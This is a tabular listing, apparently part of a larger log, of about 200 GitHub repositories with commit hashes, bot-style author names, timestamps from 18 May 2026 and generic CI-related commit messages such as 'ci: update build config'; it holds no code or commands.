| 2574 | jenish-prog/lab.md | 73d396a63f19 | auto-ci | [email protected] | 2026-05-18T14:04:17.000Z | fix: correct build workflow |
| 2575 | BryanAlexanderSantoso/first-1 | 73de8f785a3b | auto-ci | [email protected] | 2026-05-18T13:46:30.000Z | chore: update ci/cd pipeline |
| 2576 | UJ911/Quantitative-modelling-of-temporary-impact-function | 73f770d9c89e | build-bot | [email protected] | 2026-05-18T13:38:30.000Z | ci: update build config |
| 2577 | SahilVGite/presight_360 | 7411eb94be69 | ci-bot | [email protected] | 2026-05-18T12:04:31.000Z | fix: correct build workflow |
| 2578 | abdel1452/e-commerce | 7413a4872487 | pipeline-bot | [email protected] | 2026-05-18T11:59:12.000Z | chore: sync ci configuration |
| 2579 | vichuer/moovbe | 7434dd956ddb | build-bot | [email protected] | 2026-05-18T12:52:18.000Z | chore: update ci/cd pipeline |
| 2580 | youaremywind/youaremywind.github.io | 7445f9928e2b | ci-bot | [email protected] | 2026-05-18T13:02:35.000Z | chore: optimize pipeline runtime |
| 2581 | oluccasfernandes/Exercicio-Java-2 | 74548f62c9a5 | build-bot | [email protected] | 2026-05-18T16:07:32.000Z | ci: update build config |
| 2582 | Don-Antonio18/info2180-lab1 | 7463f46d44f4 | build-bot | [email protected] | 2026-05-18T15:37:04.000Z | build: improve ci performance |
| 2583 | WaveCloudx/catozolala- | 7483d8f0abfb | ci-bot | [email protected] | 2026-05-18T13:48:02.000Z | fix: correct build workflow |
| 2584 | azimsidd/Android-Roadmap | 749cd8c92011 | pipeline-bot | [email protected] | 2026-05-18T13:26:00.000Z | build: improve ci performance |
| 2585 | ConnectSiteForge/notes-3r3t57 | 74aa3f97bf5b | auto-ci | [email protected] | 2026-05-18T14:34:39.000Z | fix: correct build workflow |
| 2586 | naveenJose24/qrurl_privacy_policy | 74b420c23c99 | pipeline-bot | [email protected] | 2026-05-18T13:49:20.000Z | chore: sync ci configuration |
| 2587 | vkuznet/cbf-server | 74b7948b6c6e | ci-bot | [email protected] | 2026-05-18T13:49:23.000Z | chore: update ci/cd pipeline |
| 2588 | Piyush-Bansal9/portfolio | 74daed645819 | pipeline-bot | [email protected] | 2026-05-18T12:06:26.000Z | fix: correct build workflow |
| 2589 | aledipa/ListeNet | 74e01c2d4d9d | pipeline-bot | [email protected] | 2026-05-18T12:37:44.000Z | ci: update build config |
| 2590 | fraross00/codici | 74e516601cfd | build-bot | [email protected] | 2026-05-18T12:52:47.000Z | build: improve ci performance |
| 2591 | JKS-sys/Dispatch-Proxy-macOS-App-At-0001-11-APR-2026 | 74e86a79f060 | pipeline-bot | [email protected] | 2026-05-18T14:13:20.000Z | fix: correct build workflow |
| 2592 | pranto2051/face_change_web-app_01 | 74f58e8b2cc9 | ci-bot | [email protected] | 2026-05-18T13:55:13.000Z | fix: correct build workflow |
| 2593 | xy-uv/inftimes-api | 75020e6b401a | auto-ci | [email protected] | 2026-05-18T14:13:42.000Z | chore: update ci/cd pipeline |
| 2594 | UJ911/Code-Similarity-index-using-ASTs-norm-and-string-token-vectorization- | 7503a60e1227 | auto-ci | [email protected] | 2026-05-18T13:42:49.000Z | chore: optimize pipeline runtime |
| 2595 | RaoMehdiHassan/React-Project-Final-04-05-2026 | 75066a28e90e | ci-bot | [email protected] | 2026-05-18T13:29:02.000Z | chore: sync ci configuration |
| 2596 | ZunsodB/Automatic-Watering-System | 7506e4a34c44 | ci-bot | [email protected] | 2026-05-18T16:26:41.000Z | ci: update build config |
| 2597 | edrichard/test-action-1778117511387863800 | 750fd4e97f27 | ci-bot | [email protected] | 2026-05-18T15:39:58.000Z | ci: add build optimization step |
| 2598 | Akisan98/flutter_dummy | 751697ff7dea | ci-bot | [email protected] | 2026-05-18T14:06:51.000Z | ci: add build optimization step |
| 2599 | AbleEm/practise | 75366a80402c | ci-bot | [email protected] | 2026-05-18T13:22:26.000Z | fix: correct build workflow |
| 2600 | roydellclarke/tutorial | 7544ac83bb0a | ci-bot | [email protected] | 2026-05-18T13:03:49.000Z | chore: sync ci configuration |
| 2601 | musatekin/NLP---Spam-Message-Classification | 755ed317ed78 | pipeline-bot | [email protected] | 2026-05-18T17:06:52.000Z | chore: sync ci configuration |
| 2602 | EnamulBokshi/dish-score-client | 7562959126fd | pipeline-bot | [email protected] | 2026-05-18T15:25:10.000Z | build: improve ci performance |
| 2603 | kirankhadka9/Quantum-Computing | 7564b1c5546d | pipeline-bot | [email protected] | 2026-05-18T16:33:28.000Z | chore: sync ci configuration |
| 2604 | Srj-Love/DataStoreDemo | 757dd5bc74a1 | pipeline-bot | [email protected] | 2026-05-18T12:50:23.000Z | fix: correct build workflow |
| 2605 | samuelpatro/manik | 7586427a2618 | auto-ci | [email protected] | 2026-05-18T11:50:13.000Z | ci: update build config |
| 2606 | mmiemmiedevelop/squid_game_shopping_platform | 758eaddc29d5 | ci-bot | [email protected] | 2026-05-18T12:53:31.000Z | ci: add build optimization step |
| 2607 | batnano/chatty-plate-helper | 759409fc1bd1 | ci-bot | [email protected] | 2026-05-18T15:27:57.000Z | fix: correct build workflow |
| 2608 | Devanshu-code/Rutherford_Scattering | 75976a6839ca | build-bot | [email protected] | 2026-05-18T13:41:49.000Z | ci: add build optimization step |
| 2609 | pooooriya/vandar-mock | 75a3dc7511e2 | ci-bot | [email protected] | 2026-05-18T12:52:48.000Z | ci: update build config |
| 2610 | fadexadex/agent-app | 75aa23905818 | pipeline-bot | [email protected] | 2026-05-18T17:17:22.000Z | chore: sync ci configuration |
| 2611 | BintouDiaby/Portfolio-Bintoudby | 75f9d7be3ff6 | ci-bot | [email protected] | 2026-05-18T17:31:14.000Z | chore: sync ci configuration |
| 2612 | Raja244/NatWest_Group_Assignment | 760452772095 | auto-ci | [email protected] | 2026-05-18T15:40:30.000Z | build: improve ci performance |
| 2613 | gokul-227/AWS-Flat-File-Archival-Lakehouse | 7614a47804a1 | build-bot | [email protected] | 2026-05-18T16:22:25.000Z | ci: add build optimization step |
| 2614 | andrewillian/EstudoUdemy1 | 76270743f187 | build-bot | [email protected] | 2026-05-18T16:14:04.000Z | ci: add build optimization step |
| 2615 | ShaileshS237/quickchicken_user | 7628afac7aec | build-bot | [email protected] | 2026-05-18T16:58:37.000Z | ci: add build optimization step |
| 2616 | l8yh1/bot | 762a5a14b922 | auto-ci | [email protected] | 2026-05-18T17:25:46.000Z | chore: sync ci configuration |
| 2617 | noufalva22/CICD-pipeline | 762cf53b434c | ci-bot | [email protected] | 2026-05-18T16:04:50.000Z | chore: update ci/cd pipeline |
| 2618 | Shirley940613/haobin1140613.Github.io | 76304855ffd6 | build-bot | [email protected] | 2026-05-18T13:57:27.000Z | ci: add build optimization step |
| 2619 | IsidurPaine/PIng-Talk | 763bcfd432b1 | build-bot | [email protected] | 2026-05-18T12:50:35.000Z | chore: update ci/cd pipeline |
| 2620 | ErezD1/EscapeRoomManager | 7656167dc4f2 | pipeline-bot | [email protected] | 2026-05-18T12:32:12.000Z | build: improve ci performance |
| 2621 | EnamulBokshi/saviour-donateBlood-server | 76670dfa1c83 | pipeline-bot | [email protected] | 2026-05-18T15:28:57.000Z | ci: add build optimization step |
| 2622 | Akisan98/HarvardX-CS50W | 767e4545cb6b | ci-bot | [email protected] | 2026-05-18T14:06:29.000Z | chore: optimize pipeline runtime |
| 2623 | umairabhatti786/Nozzle | 76a01ec3a2d2 | auto-ci | [email protected] | 2026-05-18T13:04:15.000Z | ci: update build config |
| 2624 | sofatutor/bedrock-chatbot | 76a3d3375c90 | build-bot | [email protected] | 2026-05-18T13:15:23.000Z | ci: add build optimization step |
| 2625 | Nazar-end/VSENAGON-V1-smartphone | 76a42e105121 | auto-ci | [email protected] | 2026-05-18T16:16:22.000Z | chore: update ci/cd pipeline |
| 2626 | vahitkeskin/Equatix | 76a9810c114a | pipeline-bot | [email protected] | 2026-05-18T13:21:23.000Z | chore: sync ci configuration |
| 2627 | AmanWorku/wudassie-database | 76bf23c5191a | build-bot | [email protected] | 2026-05-18T12:00:23.000Z | chore: update ci/cd pipeline |
| 2628 | alexmagwe/memories | 76c838bca560 | auto-ci | [email protected] | 2026-05-18T13:03:13.000Z | ci: add build optimization step |
| 2629 | varJJ/ejercicio2 | 76d283bf1284 | build-bot | [email protected] | 2026-05-18T12:10:10.000Z | chore: sync ci configuration |
| 2630 | arpita009/AimerOnlineELearningApp | 76d660f34445 | pipeline-bot | [email protected] | 2026-05-18T16:35:52.000Z | ci: add build optimization step |
| 2631 | Gigih1996/frontend-task-ecommerce | 76e62e1670ff | auto-ci | [email protected] | 2026-05-18T16:59:08.000Z | chore: update ci/cd pipeline |
| 2632 | onenarok777/crud | 76f26c24c5db | build-bot | [email protected] | 2026-05-18T12:47:52.000Z | ci: update build config |
| 2633 | saradune6/FM_Chatbot | 76f6075de1f9 | ci-bot | [email protected] | 2026-05-18T12:59:03.000Z | chore: sync ci configuration |
| 2634 | CreativeMasterBonin/overpoweredmastery | 76f8d9350bfc | pipeline-bot | [email protected] | 2026-05-18T14:04:30.000Z | ci: update build config |
| 2635 | kingjamesegun/QuizApp | 770c495c6e58 | ci-bot | [email protected] | 2026-05-18T12:32:25.000Z | ci: add build optimization step |
| 2636 | EnigmaOrg101/trip_optima | 770df02cf678 | auto-ci | [email protected] | 2026-05-18T12:06:55.000Z | ci: update build config |
| 2637 | WIZnet-ioNIC/WIZnet-PICO-LWIP-C | 771e3e238da2 | pipeline-bot | [email protected] | 2026-05-18T16:39:14.000Z | chore: sync ci configuration |
| 2638 | just-abdullah-dev/Sample-Projects | 773af3f2ebcf | pipeline-bot | [email protected] | 2026-05-18T14:00:02.000Z | ci: update build config |
| 2639 | serena0322/Sito_EdilGiuliani | 7741a02f8cfe | auto-ci | [email protected] | 2026-05-18T12:55:17.000Z | build: improve ci performance |
| 2640 | jsged/rice | 7741aea5ffa5 | ci-bot | [email protected] | 2026-05-18T17:07:33.000Z | chore: optimize pipeline runtime |
| 2641 | moinkhaneddtr-cloud/my-wifuu-website- | 7749c247f6c2 | pipeline-bot | [email protected] | 2026-05-18T16:16:49.000Z | chore: update ci/cd pipeline |
| 2642 | YannCG/YannCGStation-Universal-Hitbox-Elite | 776cc16afd90 | ci-bot | [email protected] | 2026-05-18T15:49:16.000Z | ci: add build optimization step |
| 2643 | plofknaapje/data-challenge-kartel | 7798fb1fe9b7 | ci-bot | [email protected] | 2026-05-18T12:38:14.000Z | chore: sync ci configuration |
| 2644 | cloudyape/Ankit-Vashishta-DSALabSolution | 7799fb95ee22 | auto-ci | [email protected] | 2026-05-18T16:31:56.000Z | fix: correct build workflow |
| 2645 | edrichard/test-action-1777086797170025500 | 77b83b04a46b | build-bot | [email protected] | 2026-05-18T16:01:28.000Z | build: improve ci performance |
| 2646 | bishaldahal4777/practice-todo | 77d79cf0ffb1 | pipeline-bot | [email protected] | 2026-05-18T13:30:47.000Z | chore: sync ci configuration |
| 2647 | Vikas00413/DemoTest | 77dc46d484a2 | pipeline-bot | [email protected] | 2026-05-18T16:57:41.000Z | ci: add build optimization step |
| 2648 | SevenGnu/test-action-1778959303666817417 | 77ee4a583142 | auto-ci | [email protected] | 2026-05-18T12:03:21.000Z | build: improve ci performance |
| 2649 | deploy11/easyshop | 77fa59f21596 | ci-bot | [email protected] | 2026-05-18T11:54:37.000Z | build: improve ci performance |
| 2650 | chitthushine/Real-Time-Emotional-Recognition-with-Deep-Learning | 7803d5bcbb85 | pipeline-bot | [email protected] | 2026-05-18T12:55:50.000Z | chore: optimize pipeline runtime |
| 2651 | alessandroberna/BibliotecaBabele | 78046eaf4704 | pipeline-bot | [email protected] | 2026-05-18T12:35:49.000Z | chore: optimize pipeline runtime |
| 2652 | cslant/github-project-php | 780af1999d63 | pipeline-bot | [email protected] | 2026-05-18T16:34:54.000Z | ci: update build config |
| 2653 | sahidDev09/Luba-Beauty-server | 7814fdc18d46 | auto-ci | [email protected] | 2026-05-18T16:08:52.000Z | ci: add build optimization step |
| 2654 | noushiFlex/alibaba_scrapping_python | 7833327fcfa7 | ci-bot | [email protected] | 2026-05-18T17:43:45.000Z | chore: optimize pipeline runtime |
| 2655 | IndianArjun94/FTC-CyberEagles-25-26 | 783efaa7d925 | ci-bot | [email protected] | 2026-05-18T16:00:32.000Z | ci: update build config |
| 2656 | iamroshanpatak/test-action-1779100116837742161 | 783fe2ac461d | build-bot | [email protected] | 2026-05-18T16:28:39.000Z | ci: update build config |
| 2657 | ChanceDevelopment/nurseService | 7843c3f5f12c | pipeline-bot | [email protected] | 2026-05-18T12:42:14.000Z | chore: optimize pipeline runtime |
| 2658 | shot-pact/backend | 78486fb355ce | ci-bot | [email protected] | 2026-05-18T13:36:00.000Z | build: improve ci performance |
| 2659 | trixobird/history_quiz | 784b229e8b1b | pipeline-bot | [email protected] | 2026-05-18T14:42:18.000Z | build: improve ci performance |
| 2660 | git-init-priyanshu/WebRTC | 784b91efea06 | build-bot | [email protected] | 2026-05-18T17:13:58.000Z | fix: correct build workflow |
| 2661 | edrichard/test-action-1777082658965028100 | 7850f9228d82 | pipeline-bot | [email protected] | 2026-05-18T16:01:54.000Z | ci: update build config |
| 2662 | suggestied/q3s3 | 7856440a89bb | build-bot | [email protected] | 2026-05-18T12:51:24.000Z | build: improve ci performance |
| 2663 | Taha-khaled1/app-motkaml | 78631587dfde | ci-bot | [email protected] | 2026-05-18T14:49:54.000Z | chore: update ci/cd pipeline |
| 2664 | Rezasz/dxb-backend-data | 786e1bc1491f | pipeline-bot | [email protected] | 2026-05-18T13:32:00.000Z | chore: sync ci configuration |
| 2665 | binkaiff/Software-Development | 7889e0cbc914 | ci-bot | [email protected] | 2026-05-18T15:49:10.000Z | ci: update build config |
| 2666 | diavanda/https---github.com-diavanda-UI-Diavanda | 788d5c61f04d | build-bot | [email protected] | 2026-05-18T12:35:50.000Z | fix: correct build workflow |
| 2667 | arpanpokharel07/Portfolio-Website | 7891b54b6098 | build-bot | [email protected] | 2026-05-18T16:24:28.000Z | chore: sync ci configuration |
| 2668 | git-init-priyanshu/personal-VScode-shortcuts | 789255f7261c | build-bot | [email protected] | 2026-05-18T17:10:48.000Z | chore: optimize pipeline runtime |
| 2669 | chicoluan/UserAndAgeList | 78b7eae11fae | pipeline-bot | [email protected] | 2026-05-18T12:35:43.000Z | chore: update ci/cd pipeline |
| 2670 | rajanyadav80/test-action-1778960008067398728 | 78b815a7f3c7 | auto-ci | [email protected] | 2026-05-18T13:06:27.000Z | chore: optimize pipeline runtime |
| 2671 | amitos80/better-instagram | 78c49d55d874 | ci-bot | [email protected] | 2026-05-18T13:50:00.000Z | build: improve ci performance |
| 2672 | Piyush-Bansal9/TrendHive | 78c8ff576ad4 | ci-bot | [email protected] | 2026-05-18T12:05:42.000Z | chore: optimize pipeline runtime |
| 2673 | EnamulBokshi/ABC-group-final-project | 78c9cdc3e4e1 | pipeline-bot | [email protected] | 2026-05-18T15:35:11.000Z | chore: update ci/cd pipeline |
| 2674 | binkaiff/modern-photo-gallery-website | 78e1d41f1086 | pipeline-bot | [email protected] | 2026-05-18T15:48:28.000Z | fix: correct build workflow |
| 2675 | gokul-227/AWS-Engineering-Knowledge-Chatbot | 790533ee486b | build-bot | [email protected] | 2026-05-18T16:21:03.000Z | build: improve ci performance |
| 2676 | l8yh1/gfhkj | 790641b6fd48 | auto-ci | [email protected] | 2026-05-18T17:32:23.000Z | chore: optimize pipeline runtime |
| 2677 | aurore017/Huguzz | 7920964eee30 | build-bot | [email protected] | 2026-05-18T13:28:56.000Z | chore: update ci/cd pipeline |
| 2678 | thebenmerlin/Kaggle-Irrigation-Prediction | 79266cfefd04 | auto-ci | [email protected] | 2026-05-18T12:11:52.000Z | fix: correct build workflow |
| 2679 | Ankit0921/Bootstrap-template | 7926db82184b | build-bot | [email protected] | 2026-05-18T13:35:43.000Z | ci: update build config |
| 2680 | 0xdps/inbounce | 79280abdc2d8 | pipeline-bot | [email protected] | 2026-05-18T13:57:12.000Z | build: improve ci performance |
| 2681 | Taha-khaled1/klean-koo | 792a34376324 | pipeline-bot | [email protected] | 2026-05-18T14:51:42.000Z | chore: sync ci configuration |
| 2682 | deploy11/hosidlornew | 793a287f3d18 | ci-bot | [email protected] | 2026-05-18T11:49:06.000Z | build: improve ci performance |
| 2683 | AbhishekAnamala/studentdetails | 793c3721e2a0 | build-bot | [email protected] | 2026-05-18T16:12:08.000Z | fix: correct build workflow |
| 2684 | sahidDev09/protfolio-practice-01 | 79432fac191b | ci-bot | [email protected] | 2026-05-18T16:13:42.000Z | ci: update build config |
| 2685 | EnamulBokshi/ecommerce-cart-state-management | 7950d44ae092 | build-bot | [email protected] | 2026-05-18T15:28:36.000Z | chore: optimize pipeline runtime |
| 2686 | RuchirKadam1729/lazyjupyter | 79523b976d15 | ci-bot | [email protected] | 2026-05-18T12:57:03.000Z | ci: update build config |
| 2687 | WIZnet-ioNIC/WIZnet-PICO-PING-C | 7967a9e808c3 | build-bot | [email protected] | 2026-05-18T16:30:31.000Z | ci: update build config |
| 2688 | codemonkey2704/XC | 798dbde82abc | ci-bot | [email protected] | 2026-05-18T12:47:50.000Z | chore: sync ci configuration |
| 2689 | BryanAlexanderSantoso/Fullstack-React-x-Express | 7998e318cd21 | build-bot | [email protected] | 2026-05-18T13:45:00.000Z | ci: add build optimization step |
| 2690 | pareesa969/NeuroBridge-Tool | 7999dca4bcfb | pipeline-bot | [email protected] | 2026-05-18T13:42:36.000Z | build: improve ci performance |
| 2691 | the-wilful-youth/Kalam | 79af38febded | auto-ci | [email protected] | 2026-05-18T16:20:16.000Z | chore: sync ci configuration |
| 2692 | Matribuk/minigolf_TP1 | 79b3a9ee66f6 | pipeline-bot | [email protected] | 2026-05-18T14:03:45.000Z | ci: add build optimization step |
| 2693 | JackRArne/Falcon-RAD | 79bac16d707e | ci-bot | [email protected] | 2026-05-18T16:09:42.000Z | chore: update ci/cd pipeline |
| 2694 | umakantmukhiya/test-action-1778960008419198904 | 79bbecc897a2 | pipeline-bot | [email protected] | 2026-05-18T15:41:50.000Z | fix: correct build workflow |
| 2695 | Skypieee6/techwala-site | 79ff5cf897bf | auto-ci | [email protected] | 2026-05-18T14:32:35.000Z | fix: correct build workflow |
| 2696 | louvelg/24h2017 | 7a04cb3544d2 | auto-ci | [email protected] | 2026-05-18T16:03:05.000Z | chore: sync ci configuration |
| 2697 | Ashwiin/Space-X-Falcon-9-First-Stage-Landing-Prediction | 7a0c41076e34 | ci-bot | [email protected] | 2026-05-18T16:52:07.000Z | fix: correct build workflow |
| 2698 | ankitkumar572005/AkkiKrsingh2005 | 7a12b2430e32 | ci-bot | [email protected] | 2026-05-18T16:43:06.000Z | chore: sync ci configuration |
| 2699 | Confoosion/duckngoose | 7a150cbf46b6 | ci-bot | [email protected] | 2026-05-18T16:01:17.000Z | chore: sync ci configuration |
| 2700 | amitos80/chakra-theme | 7a19ef55dbc4 | build-bot | [email protected] | 2026-05-18T13:54:48.000Z | ci: update build config |
| 2701 | EnamulBokshi/ph-healthcare-client | 7a1d6d7b0f30 | auto-ci | [email protected] | 2026-05-18T15:29:42.000Z | ci: add build optimization step |
| 2702 | mwasalat/LPO | 7a27c79da3f9 | build-bot | [email protected] | 2026-05-18T15:14:23.000Z | ci: add build optimization step |
| 2703 | Udbhav-2025/udbhav-ht100-cc-001 | 7a31aa873bf7 | auto-ci | [email protected] | 2026-05-18T13:04:56.000Z | ci: add build optimization step |
| 2704 | todrfu/todrfu | 7a58f01e09f8 | build-bot | [email protected] | 2026-05-18T14:12:20.000Z | chore: sync ci configuration |
| 2705 | Yousif-12/test-action-1778964631126473213 | 7a5f1bc6affa | pipeline-bot | [email protected] | 2026-05-18T13:27:48.000Z | ci: update build config |
| 2706 | cheikhtourad19/PFE2023 | 7a82951deb35 | build-bot | [email protected] | 2026-05-18T12:12:28.000Z | chore: sync ci configuration |
| 2707 | Diogenesoftoronto/write-and-wood | 7a8409a821ba | pipeline-bot | [email protected] | 2026-05-18T12:32:24.000Z | ci: add build optimization step |
| 2708 | kelvinsinsua/scalaya_backend | 7a8e35e65367 | auto-ci | [email protected] | 2026-05-18T17:39:21.000Z | chore: optimize pipeline runtime |
| 2709 | JGabrielMendes/I2A2-AIProject-TeamJLV | 7a963dbaebf7 | ci-bot | [email protected] | 2026-05-18T14:24:12.000Z | fix: correct build workflow |
| 2710 | NaimurDev/flutter_rating_dialog | 7aa6e26d7e0b | auto-ci | [email protected] | 2026-05-18T16:01:06.000Z | chore: optimize pipeline runtime |
| 2711 | MouadKH9/portfolio-backend | 7abdfa5ba2e1 | ci-bot | [email protected] | 2026-05-18T13:08:29.000Z | ci: add build optimization step |
| 2712 | mkanbu999/I-code | 7abfae8a9ae4 | build-bot | [email protected] | 2026-05-18T16:31:02.000Z | build: improve ci performance |
| 2713 | binkaiff/codveda-level2-task3-react-calculator | 7ac11bee6139 | auto-ci | [email protected] | 2026-05-18T15:48:38.000Z | ci: update build config |
| 2714 | deploy11/SirdaryoReactNative | 7ac1dad2fc62 | pipeline-bot | [email protected] | 2026-05-18T11:50:55.000Z | chore: update ci/cd pipeline |
| 2715 | kayosama007/ci-build-20260329-190536-4564 | 7ace6f7a803a | pipeline-bot | [email protected] | 2026-05-18T14:23:22.000Z | build: improve ci performance |
| 2716 | SahilVGite/WBTL | 7aed709ab3e5 | auto-ci | [email protected] | 2026-05-18T12:21:57.000Z | ci: add build optimization step |
| 2717 | isaac372/EncuestaOnline1 | 7afb1b003910 | pipeline-bot | [email protected] | 2026-05-18T13:02:44.000Z | chore: sync ci configuration |
| 2718 | YannCG/YannCG-Script | 7b04d023c236 | ci-bot | [email protected] | 2026-05-18T15:49:39.000Z | build: improve ci performance |
| 2719 | David-Irihose/alu-system_engineering-devops | 7b0e0b502587 | ci-bot | [email protected] | 2026-05-18T13:26:44.000Z | ci: update build config |
| 2720 | RameshRukshan/vy-web-FE | 7b15fff3314b | ci-bot | [email protected] | 2026-05-18T17:09:38.000Z | fix: correct build workflow |
| 2721 | TharunReddy4321/online-retail-data-visualization | 7b18811a0a47 | ci-bot | [email protected] | 2026-05-18T16:35:42.000Z | fix: correct build workflow |
| 2722 | Sbongslany/job-web | 7b1d58774551 | ci-bot | [email protected] | 2026-05-18T16:29:49.000Z | ci: add build optimization step |
| 2723 | darkweaver87/traefik-load-balancing | 7b27366a96cf | pipeline-bot | [email protected] | 2026-05-18T13:53:40.000Z | ci: update build config |
| 2724 | Confoosion/Drift | 7b2b4ddc9285 | ci-bot | [email protected] | 2026-05-18T16:14:03.000Z | chore: sync ci configuration |
| 2725 | Srj-Love/JavaToKotlin | 7b3db28f901e | pipeline-bot | [email protected] | 2026-05-18T12:54:42.000Z | chore: sync ci configuration |
| 2726 | riomukhtarom/ml-pengembangan-dicoding | 7b41cfc0b8c3 | pipeline-bot | [email protected] | 2026-05-18T15:41:42.000Z | build: improve ci performance |
| 2727 | jhonPatino/Calculadora_arquitectura | 7b482a701139 | ci-bot | [email protected] | 2026-05-18T16:08:08.000Z | ci: add build optimization step |
| 2728 | kamel912/movies_flutter | 7b4fabfe5540 | build-bot | [email protected] | 2026-05-18T14:06:12.000Z | ci: update build config |
| 2729 | Jacksonpirlo/front-project | 7b5e41677d94 | pipeline-bot | [email protected] | 2026-05-18T16:53:21.000Z | ci: add build optimization step |
| 2730 | l8yh1/dwda | 7b6436248831 | build-bot | [email protected] | 2026-05-18T17:26:43.000Z | fix: correct build workflow |
| 2731 | akash-guptaa/easypay | 7b77969a033a | pipeline-bot | [email protected] | 2026-05-18T16:13:06.000Z | fix: correct build workflow |
| 2732 | kartikmehta18/ScholarDao | 7b79d7ba9b9c | ci-bot | [email protected] | 2026-05-18T16:34:59.000Z | ci: add build optimization step |
| 2733 | NalineeKant-82/ordio-test | 7b7c45ef5f40 | auto-ci | [email protected] | 2026-05-18T17:46:10.000Z | fix: correct build workflow |
| 2734 | lollounicam/Unicam.Paradigmi | 7b8e76c229fc | pipeline-bot | [email protected] | 2026-05-18T16:54:19.000Z | fix: correct build workflow |
| 2735 | MusabBoltX/todo_app_with_postgres | 7bb59d4dcdc8 | pipeline-bot | [email protected] | 2026-05-18T13:46:53.000Z | chore: update ci/cd pipeline |
| 2736 | codehalic/gelato-house-reactjs | 7bc45650566f | ci-bot | [email protected] | 2026-05-18T12:52:41.000Z | ci: update build config |
| 2737 | yessurprises/epicstage-kv-studio | 7bdd10fdb878 | pipeline-bot | [email protected] | 2026-05-18T14:17:51.000Z | build: improve ci performance |
| 2738 | HamzaElMkhantar/mern-bookStore | 7bde75be4e4f | auto-ci | [email protected] | 2026-05-18T17:20:27.000Z | chore: update ci/cd pipeline |
| 2739 | zarvish/support-desk-mvp | 7be68427740f | ci-bot | [email protected] | 2026-05-18T12:20:07.000Z | build: improve ci performance |
| 2740 | RameshRukshan/PaySlips | 7be6c02030f2 | pipeline-bot | [email protected] | 2026-05-18T17:18:36.000Z | fix: correct build workflow |
| 2741 | ffoggi/shakespeare | 7c0691298229 | auto-ci | [email protected] | 2026-05-18T13:57:58.000Z | chore: sync ci configuration |
| 2742 | VikingProduction/echecs | 7c06a6589985 | auto-ci | [email protected] | 2026-05-18T14:37:54.000Z | fix: correct build workflow |
| 2743 | yashlad27/airbnb-video | 7c09e9e1b72e | pipeline-bot | [email protected] | 2026-05-18T13:30:19.000Z | build: improve ci performance |
| 2744 | chicoluan/fmcsa-viewer | 7c0de48046c6 | build-bot | [email protected] | 2026-05-18T12:25:55.000Z | fix: correct build workflow |
| 2745 | np03cy4a250023-gif/Unity- | 7c1117256a65 | ci-bot | [email protected] | 2026-05-18T13:37:47.000Z | fix: correct build workflow |
| 2746 | nnfuad/nnfuados | 7c17e5d0f0c9 | pipeline-bot | [email protected] | 2026-05-18T13:20:11.000Z | chore: update ci/cd pipeline |
| 2747 | myssaqil/Watch_Movie-MobileApps-Flutter | 7c1c42fff182 | build-bot | [email protected] | 2026-05-18T14:17:07.000Z | build: improve ci performance |
| 2748 | hahaha-zsq/winter-security-spring-boot3-starter | 7c1fb65d8617 | pipeline-bot | [email protected] | 2026-05-18T12:06:31.000Z | chore: sync ci configuration |
| 2749 | ahtisham02/holiday_plan_api | 7c26ea8a0e53 | pipeline-bot | [email protected] | 2026-05-18T15:23:01.000Z | ci: update build config |
| 2750 | smit-sk/api-service-azure | 7c2a074a5cb2 | build-bot | [email protected] | 2026-05-18T16:11:38.000Z | chore: sync ci configuration |
| 2751 | afomkina/afomkina | 7c2f08574205 | pipeline-bot | [email protected] | 2026-05-18T13:48:09.000Z | fix: correct build workflow |
| 2752 | danhoernchen/odin-weather-app | 7c4ccdc338b1 | pipeline-bot | [email protected] | 2026-05-18T13:54:28.000Z | ci: add build optimization step |
| 2753 | EnamulBokshi/python-lab | 7c5caf45864f | build-bot | [email protected] | 2026-05-18T15:35:03.000Z | ci: add build optimization step |
| 2754 | Akisan98/portfolio-v4 | 7c5cd2903ee0 | ci-bot | [email protected] | 2026-05-18T14:03:51.000Z | ci: add build optimization step |
| 2755 | RameshRukshan/page-clone-mirror | 7c78cf19b7ce | ci-bot | [email protected] | 2026-05-18T17:11:40.000Z | ci: add build optimization step |
| 2756 | EnamulBokshi/Java-abstraction | 7c9cfe47d5e8 | pipeline-bot | [email protected] | 2026-05-18T15:35:43.000Z | ci: update build config |
| 2757 | itsmyfox/WorldGuard-RUS-1.21.4 | 7cada204e688 | build-bot | [email protected] | 2026-05-18T14:52:34.000Z | chore: sync ci configuration |
| 2758 | l8yh1/bom | 7cbca0e7a646 | auto-ci | [email protected] | 2026-05-18T17:29:47.000Z | build: improve ci performance |
| 2759 | just-abdullah-dev/Module-3-Assignment | 7cccf4629043 | ci-bot | [email protected] | 2026-05-18T13:59:46.000Z | fix: correct build workflow |
| 2760 | jakhadakash/ci-pipeline | 7cd6237ec4c6 | auto-ci | [email protected] | 2026-05-18T14:57:48.000Z | fix: correct build workflow |
| 2761 | guimmamanna/testing-agents | 7ce3e8b28a6f | ci-bot | [email protected] | 2026-05-18T13:05:00.000Z | fix: correct build workflow |
| 2762 | sahidDev09/CareerLinker-2.0 | 7ceeed063220 | build-bot | [email protected] | 2026-05-18T16:04:29.000Z | chore: update ci/cd pipeline |
| 2763 | PeterTokmakov/conversation-bot | 7d0207e40ad8 | ci-bot | [email protected] | 2026-05-18T11:51:10.000Z | ci: update build config |
| 2764 | alponurc/qr-menu-app | 7d0821567819 | pipeline-bot | [email protected] | 2026-05-18T13:06:15.000Z | ci: update build config |
| 2765 | naytanvieira/html-basic | 7d10122e673c | pipeline-bot | [email protected] | 2026-05-18T15:13:29.000Z | fix: correct build workflow |
| 2766 | Stat184-Spring2025/MuhammadHanifahSyukri_MirzaFarisMohdAffendi | 7d214eec3a11 | auto-ci | [email protected] | 2026-05-18T12:13:40.000Z | build: improve ci performance |
| 2767 | AmanWorku/OOP-School-Library | 7d2834f150ba | auto-ci | [email protected] | 2026-05-18T12:27:37.000Z | chore: sync ci configuration |
| 2768 | codedecode25/udemyTestingBE | 7d2e8fdbe6e2 | build-bot | [email protected] | 2026-05-18T16:58:10.000Z | ci: update build config |
| 2769 | Prime-Sushil/Calculator | 7d33fc3b5d2f | pipeline-bot | [email protected] | 2026-05-18T12:13:41.000Z | ci: update build config |
| 2770 | Bayoor/book_management_system | 7d43c67e86d9 | build-bot | [email protected] | 2026-05-18T16:01:24.000Z | build: improve ci performance |
| 2771 | todrfu/dify-plugin-slidev | 7d4d51a1ae29 | auto-ci | [email protected] | 2026-05-18T14:12:07.000Z | ci: update build config |
| 2772 | NikAr0702/Flutter-Spring_boot-Registration | 7d66f39b72a9 | ci-bot | [email protected] | 2026-05-18T12:11:48.000Z | ci: update build config |
